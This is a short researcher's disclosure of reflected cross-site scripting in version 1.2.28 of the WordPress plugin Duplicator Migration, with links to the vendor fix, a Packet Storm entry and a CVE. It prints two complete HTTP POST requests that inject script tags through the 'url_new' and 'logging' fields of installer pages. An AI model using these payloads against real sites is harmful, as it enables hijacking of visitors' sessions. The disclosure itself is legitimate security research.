I keep finding Cross-site scripting in wordpress plugins, I’m going to have to automate it somehow:).
In this case in a plugin called “Duplicator Migration” version 1.2.28 (https://es.wordpress.org/plugins/duplicator/) which is active in more than 1 million wordpress and is developed by Snapcreek (https://snapcreek.com).
It can explode using two attack vectors:
From the view. step4. php file:
POST /wordpress//wp-content/plugins/duplicator/installer/build/view.step4.php HTTP/1.1 Host: localhost Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36 Upgrade-Insecure-Requests: 1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: es-ES,es;q=0.8 Cookie: Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 39 url_new="><script>alert(1)</script>demo
From the view.step2.php file:
POST /wordpress//wp-content/plugins/duplicator/installer/build/view.step2.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36 Upgrade-Insecure-Requests: 1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: es-ES,es;q=0.8 Cookie: Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 37 logging="><script>alert(1)</script>demo
I’m sorry I didn’t show any capture of the XSS execution but I didn’t need to do it because the Snapcreek developers didn’t ask me to.
- Developer’s appreciation:
https://snapcreek.com/duplicator/docs/changelog (apartado Lite) - Publication in Packetstormsecurity:
https://packetstormsecurity.com/files/144914/WordPress-Duplicator-Migration-1.2.28-Cross-Site-Scripting.html - CVE:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16815